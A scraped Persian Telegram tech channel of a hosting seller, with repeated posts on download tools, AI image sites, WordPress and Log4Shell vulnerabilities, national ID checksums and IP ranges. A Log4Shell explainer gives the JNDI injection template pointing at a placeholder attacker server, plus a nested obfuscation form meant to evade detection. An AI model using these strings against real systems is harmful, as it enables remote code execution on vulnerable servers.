شاید برای شما هم پیش امده که نیاز باشه یک برنامه رو داخل تلگرام برای فرد دیگه ای بفرستید یا به دلیل تحریم ها یک برنامه یا بازی رو نتونید دانلود کنید
یا مثل شرایط الان پروکسی تلگرام متصل بشه ولی VPN نداشته باشید ولی از طریف خود گوگل بتونید لینک دانلود رو از گوگل پلی بگیرید
برای اینکار میتونید از ربات @apkdl_bot استفاده کنید ، کافیه بهش لینک نرم افزار بدین
https://telegram.im/@apkdl_bot?lang=en
یا مثل شرایط الان پروکسی تلگرام متصل بشه ولی VPN نداشته باشید ولی از طریف خود گوگل بتونید لینک دانلود رو از گوگل پلی بگیرید
برای اینکار میتونید از ربات @apkdl_bot استفاده کنید ، کافیه بهش لینک نرم افزار بدین
https://telegram.im/@apkdl_bot?lang=en
Telegram
APK Downloader
Download latest version of any free android apps and games. Also check our site https://apkdl.in https://apkdl.net
👍6❤1
از آنجا که همه ما با Midjourney آشنا هستیم، ابزاری قدرتمند مبتنی بر هوش مصنوعی برای تولید تصاویر با خلاقیت های خارق العاده میباشد. اخیرا استفاده از این ابزار در دیسکورد بدون دریافت اشتراک ممکن نیست!
سایت Leonardo AI با قابلیتهای بیشتر و رابط کاربری بهتر جایگزین مناسبی برای Midjourney میباشد که بخشی از قابلیت این هوش مصنوعی را در زیر عنوان میکنم:
1- باز بودن همه قابلیتها به صورت رایگان(فقط با محدودیتهای روزانه)
2- تولید تصاویر بر اساس مدلهای مختلف
3- ویرایش و گسترش تصویر با قابلیت Canvas
4- استفاده از متن NOT شده در تولید عکس
5- بالا بردن وضوح و رزولیشین عکس تولید شده
برای دسترسی به ابزارهای Leonardo AI وارد سایت زیر بشید و با استفاده از اکانت Discord اقدام به ثبتنام و تولید عکس کنید:
🌐 https://leonardo.ai/
💠 @one3erver
سایت Leonardo AI با قابلیتهای بیشتر و رابط کاربری بهتر جایگزین مناسبی برای Midjourney میباشد که بخشی از قابلیت این هوش مصنوعی را در زیر عنوان میکنم:
1- باز بودن همه قابلیتها به صورت رایگان(فقط با محدودیتهای روزانه)
2- تولید تصاویر بر اساس مدلهای مختلف
3- ویرایش و گسترش تصویر با قابلیت Canvas
4- استفاده از متن NOT شده در تولید عکس
5- بالا بردن وضوح و رزولیشین عکس تولید شده
برای دسترسی به ابزارهای Leonardo AI وارد سایت زیر بشید و با استفاده از اکانت Discord اقدام به ثبتنام و تولید عکس کنید:
🌐 https://leonardo.ai/
💠 @one3erver
❤1
❗️نقص جدید در افزونه وردپرس که توسط بیش از یک میلیون سایت تحت بهرهبرداری فعال، استفاده شده است!
یک آسیبپذیری امنیتی در افزونه محبوب وردپرس Essential Addons for Elementor به تازگی شناسایی شده است که میتواند به طور بالقوه برای دستیابی به حق دسترسی بالا در سایتهای آسیبدیده، مورد سوء استفاده قرار گیرد.
این آسیب پذیری که CVE-2023-32243 به آن اختصاص داده شده است، در نسخه 5.7.2 که در 11 مه 2023 ، برطرف شده است. این افزونه، بیش از یک میلیون نصب فعال دارد.
محقق Patchstack، گفت: «این افزونه دارای آسیبپذیری افزایش حق دسترسی تایید نشده بود و به هر کاربر تأیید نشده اجازه میدهد تا حق دسترسی خود را به هر کاربر در سایت وردپرس افزایش دهد.
بهرهبرداری موفقیتآمیز از نقص میتواند به یک عامل تهدید اجازه دهد تا رمز عبور هر کاربر دلخواه را بازنشانی کند، تا زمانی که طرف مخرب از نام کاربری خود آگاه باشد. اعتقاد بر این است که این نقص از نسخه 5.4.0 وجود داشته است.
یک آسیبپذیری امنیتی در افزونه محبوب وردپرس Essential Addons for Elementor به تازگی شناسایی شده است که میتواند به طور بالقوه برای دستیابی به حق دسترسی بالا در سایتهای آسیبدیده، مورد سوء استفاده قرار گیرد.
این آسیب پذیری که CVE-2023-32243 به آن اختصاص داده شده است، در نسخه 5.7.2 که در 11 مه 2023 ، برطرف شده است. این افزونه، بیش از یک میلیون نصب فعال دارد.
محقق Patchstack، گفت: «این افزونه دارای آسیبپذیری افزایش حق دسترسی تایید نشده بود و به هر کاربر تأیید نشده اجازه میدهد تا حق دسترسی خود را به هر کاربر در سایت وردپرس افزایش دهد.
بهرهبرداری موفقیتآمیز از نقص میتواند به یک عامل تهدید اجازه دهد تا رمز عبور هر کاربر دلخواه را بازنشانی کند، تا زمانی که طرف مخرب از نام کاربری خود آگاه باشد. اعتقاد بر این است که این نقص از نسخه 5.4.0 وجود داشته است.
❤1👍1
یکسری سایتا هستن مثل این[ لینک سایت ] که بدون اینکه به دیتابیسی دسترسی داشته باشه تشخیص میده کدملی درسته یا نه
حالا چطوری ؟
با چیزی به نام checksum
کد ملی شما ۱۰ رقمه
۹ رقم اول رو جدا کنید
از چپ اولین عدد رو ضربدر ۱۰ کنید
دومین عدد ضربدر ۹
سومی ضربدر ۸
همینطور تا آخر که رقم آخر ضربدر ۲ میشه
حالا نتیجه هم ضرب ها رو با هم جمع کنید
عدد به دست امده رو تقسیم بر ۱۱ کنید و باقی مانده رو منهای ۱۱
اگه باقی مانده ۰ یا ۱ شد دیگه نیاز نیست منها رو انجام بدین
این عدد آخر رقم ۱۰ ام کارت ملی شماست
مثلا ۹ رقم اول یه کدملی 021225074 هستش
به این صورت باید حساب کنید
(0x10) + ( 2x9) + ( 1x8) + (2x7) + (2x6) + (5x5) + (0x4) + (7x3) + (4x2) = 106
106 mod 11 = 7 ( این باقی مانده میشه)
11 - 7 =4
رقم آخر ۴ میشه
حالا کد ملی 0212250744 که ساخته دست خودمونه رو داخل سایت وارد کنید تا چک کنه
البته checksum برای موارد دیگه هم استفاده میشه ، مثلا برای شماره شبا هم داریم
تو شبکه هم داخل هدر پکت ها استفاده میشه تا مقصد پکت ها متوجه بشه پکت سالمه یا نه
حالا چطوری ؟
با چیزی به نام checksum
کد ملی شما ۱۰ رقمه
۹ رقم اول رو جدا کنید
از چپ اولین عدد رو ضربدر ۱۰ کنید
دومین عدد ضربدر ۹
سومی ضربدر ۸
همینطور تا آخر که رقم آخر ضربدر ۲ میشه
حالا نتیجه هم ضرب ها رو با هم جمع کنید
عدد به دست امده رو تقسیم بر ۱۱ کنید و باقی مانده رو منهای ۱۱
اگه باقی مانده ۰ یا ۱ شد دیگه نیاز نیست منها رو انجام بدین
این عدد آخر رقم ۱۰ ام کارت ملی شماست
مثلا ۹ رقم اول یه کدملی 021225074 هستش
به این صورت باید حساب کنید
(0x10) + ( 2x9) + ( 1x8) + (2x7) + (2x6) + (5x5) + (0x4) + (7x3) + (4x2) = 106
106 mod 11 = 7 ( این باقی مانده میشه)
11 - 7 =4
رقم آخر ۴ میشه
حالا کد ملی 0212250744 که ساخته دست خودمونه رو داخل سایت وارد کنید تا چک کنه
البته checksum برای موارد دیگه هم استفاده میشه ، مثلا برای شماره شبا هم داریم
تو شبکه هم داخل هدر پکت ها استفاده میشه تا مقصد پکت ها متوجه بشه پکت سالمه یا نه
❤2
#هوش_مصنوعی که بهت میگه متن و زمینت باید چه رنگی باشه👌
🔻 با استفاده از این هوش مصنوعی به راحتی هرچه تمام تر میتونید متوجه بشید که چه رنگی برای فونتون مناسبه ؛ و با توجه به پس زمینتون کدوم رنگ بیشتر بولد میشه.
1️⃣ فقط کافیه وارد این سایت بشید.
2️⃣ به پایین اسکرول کنید و گزینه Contrast checker
3️⃣ حالا تو پنل مربع بالا رنگ متن رو انتخاب میکنید و از مربع پایین هم رنگ پسزمینرو باید سلکت کنید.
4️⃣در نهایت خود سایت بر اساس تعداد ستاره و نمره ای که بهت میده میگه دوتا رنگی که انتخاب کردین چقدر خوانایی دارن باهم
💠 @one3erver
🔻 با استفاده از این هوش مصنوعی به راحتی هرچه تمام تر میتونید متوجه بشید که چه رنگی برای فونتون مناسبه ؛ و با توجه به پس زمینتون کدوم رنگ بیشتر بولد میشه.
1️⃣ فقط کافیه وارد این سایت بشید.
2️⃣ به پایین اسکرول کنید و گزینه Contrast checker
3️⃣ حالا تو پنل مربع بالا رنگ متن رو انتخاب میکنید و از مربع پایین هم رنگ پسزمینرو باید سلکت کنید.
4️⃣در نهایت خود سایت بر اساس تعداد ستاره و نمره ای که بهت میده میگه دوتا رنگی که انتخاب کردین چقدر خوانایی دارن باهم
💠 @one3erver
🔥3
جهنمی به نام Log4Shell !
در ۹ دسامبر، یک آسیبپذیری حیاتی RCE یا همان اجرای کد از راه دور در Log4J آپاچی، یک سیستم گزارشگیری و لاگ بسیار رایج که توسط توسعهدهندگان برنامههای وب و سرور مبتنی بر جاوا و سایر زبانهای برنامهنویسی استفاده میشود، آشکار شد. این آسیبپذیری در طیف گستردهای ( چند صد میلیون دستگاه) از سرویسها و برنامههای کاربردی روی سرورها را تحت تأثیر قرار میدهد و این مورد، آن را به شدت خطرناک و حساس میکند – و آخرین بهروزرسانیها برای آن برنامههای کاربردی روی سرور ضروری است.
برای درک نحوه کارکرد این اکسپلویت به دو عکس زیر نگاه کنید:
(ادامه در پست بعد)
💠 @one3erver
در ۹ دسامبر، یک آسیبپذیری حیاتی RCE یا همان اجرای کد از راه دور در Log4J آپاچی، یک سیستم گزارشگیری و لاگ بسیار رایج که توسط توسعهدهندگان برنامههای وب و سرور مبتنی بر جاوا و سایر زبانهای برنامهنویسی استفاده میشود، آشکار شد. این آسیبپذیری در طیف گستردهای ( چند صد میلیون دستگاه) از سرویسها و برنامههای کاربردی روی سرورها را تحت تأثیر قرار میدهد و این مورد، آن را به شدت خطرناک و حساس میکند – و آخرین بهروزرسانیها برای آن برنامههای کاربردی روی سرور ضروری است.
برای درک نحوه کارکرد این اکسپلویت به دو عکس زیر نگاه کنید:
(ادامه در پست بعد)
💠 @one3erver
💯2
شرح کارکرد اکسپلویت :
باگ در نسخه های قبلی Log4J ناشی از ویژگی به نام message lookup substitution است. وقتی فعال شود (که به طور پیشفرض قبل از رفع آسیب پذیری فعال بود)، Log4j رشتههایی را که به JNDI در منابعِ کانفیگِ پیامهای گزارش و پارامترهای ارسال شده توسط برنامهها ارجاع میدهند، شناسایی میکند.
از آنجایی که Log4J در URL های ارسال شده در این رشته ها sanitize را انجام نمیدهد، مهاجم می تواند با یک پیام حاوی رشته جایگزین با URL مربوط به یک سرور مخرب درخواست های مخرب را برای برنامه هایی ایجاد کند که از Log4J استفاده میکنند.
💠 @one3erver
باگ در نسخه های قبلی Log4J ناشی از ویژگی به نام message lookup substitution است. وقتی فعال شود (که به طور پیشفرض قبل از رفع آسیب پذیری فعال بود)، Log4j رشتههایی را که به JNDI در منابعِ کانفیگِ پیامهای گزارش و پارامترهای ارسال شده توسط برنامهها ارجاع میدهند، شناسایی میکند.
از آنجایی که Log4J در URL های ارسال شده در این رشته ها sanitize را انجام نمیدهد، مهاجم می تواند با یک پیام حاوی رشته جایگزین با URL مربوط به یک سرور مخرب درخواست های مخرب را برای برنامه هایی ایجاد کند که از Log4J استفاده میکنند.
💠 @one3erver
💯2
در مورد برنامههای کاربردی وب، رشته میتواند بخشی از هر بخش از یک ارتباط HTTP باشد که ثبت و به عنوان یک دستور جایگزین که به سرور مخرب ارجاع میدهد کانفیگ میشود :
${jndi:[protocol]://[remote server and code address]}
انواع مختلفی از روش های مبهم سازی برای جلوگیری از شناسایی اسکن یا اکسپلویت استفاده می شود، از جمله استفاده از رشته های تو در تو برای فراخوانی رابط مانند:
(${${::-j}${::-n}${::-d}${::-I})
هنگامی که به Log4J ارسال می شود، رشته جایگزین به عنوان یک خطا گرفته شده و URL پردازش می شود. سپس کد لاگر از URL موجود در کد درخواست را انجام داده و پاسخ serialize شده و به هکر برمیگردد- که می تواند منجر به اجرای کد ارسال شده از URL مخرب که مربوط به هکر است ، شود.
منابع :
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
💠 @one3erver
${jndi:[protocol]://[remote server and code address]}
انواع مختلفی از روش های مبهم سازی برای جلوگیری از شناسایی اسکن یا اکسپلویت استفاده می شود، از جمله استفاده از رشته های تو در تو برای فراخوانی رابط مانند:
(${${::-j}${::-n}${::-d}${::-I})
هنگامی که به Log4J ارسال می شود، رشته جایگزین به عنوان یک خطا گرفته شده و URL پردازش می شود. سپس کد لاگر از URL موجود در کد درخواست را انجام داده و پاسخ serialize شده و به هکر برمیگردد- که می تواند منجر به اجرای کد ارسال شده از URL مخرب که مربوط به هکر است ، شود.
منابع :
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/
💠 @one3erver
💯3
با عرض سلام و وقت بخیر خدمت عزیزان
دوستان عزیز از وب سایت جدید وان سرور رونمایی شد. لطفا نظرات و انتقادات خود را به ایدی تلگرام زیر ارسال بفرماید
support: @One3erver_support_bot
Website: https://one3erver.com
با تشکر
دوستان عزیز از وب سایت جدید وان سرور رونمایی شد. لطفا نظرات و انتقادات خود را به ایدی تلگرام زیر ارسال بفرماید
support: @One3erver_support_bot
Website: https://one3erver.com
با تشکر
وان سرور | One3erver
فروش سرور مجازی، اختصاصی، هاستینگ و دامنه
فروش سرور مجازی | فروش سرور احتصاصی | فروش هاست | ثبت دامین | افزایش فالوور اینستاگرام | فروش پیج اینستاگرام | فروش سرور فول وارز | نمایندگی هاست
❤4🤩3
مقدماتی بر IP آدرس ها - بخش اول
درک IP پرایوت / Private :
تفاوت آیپی های public یا private چیست ؟
آدرس های آی پی به دو دسته Private (خصوصی) Public (عمومی) تقسیم بندی می شوند . آدرس های Public همان آدرس هایی هستند که در نهایت در اینترنت شناسه یک کامپیوتر خاص می شوند و معرف و شناسنامه یک کامپیوتر یا دیوایس خاص در دنیای Public است . ولی آی پی آدرس های Private چه هستند ؟ قبل توضیح اینکه این آدرس ها چه هستند و چگونه در دنیای اینترنت قابل دسترسی می شوند , بهتر است بدانیم که آنها در یک رنج خاصی تعریف شده هستند و بقیه آدرس ها به غیر از این رنج آدرس های Public را تشکیل خواهند داد .
رنج اول : 10.0.0.0
رنج دوم : 172.16.0.0 تا 172.31.0.0
رنج سوم : 192.168.0.0
(ادامه در پست پایین) :
💠 @one3erver
درک IP پرایوت / Private :
تفاوت آیپی های public یا private چیست ؟
آدرس های آی پی به دو دسته Private (خصوصی) Public (عمومی) تقسیم بندی می شوند . آدرس های Public همان آدرس هایی هستند که در نهایت در اینترنت شناسه یک کامپیوتر خاص می شوند و معرف و شناسنامه یک کامپیوتر یا دیوایس خاص در دنیای Public است . ولی آی پی آدرس های Private چه هستند ؟ قبل توضیح اینکه این آدرس ها چه هستند و چگونه در دنیای اینترنت قابل دسترسی می شوند , بهتر است بدانیم که آنها در یک رنج خاصی تعریف شده هستند و بقیه آدرس ها به غیر از این رنج آدرس های Public را تشکیل خواهند داد .
رنج اول : 10.0.0.0
رنج دوم : 172.16.0.0 تا 172.31.0.0
رنج سوم : 192.168.0.0
(ادامه در پست پایین) :
💠 @one3erver
❤5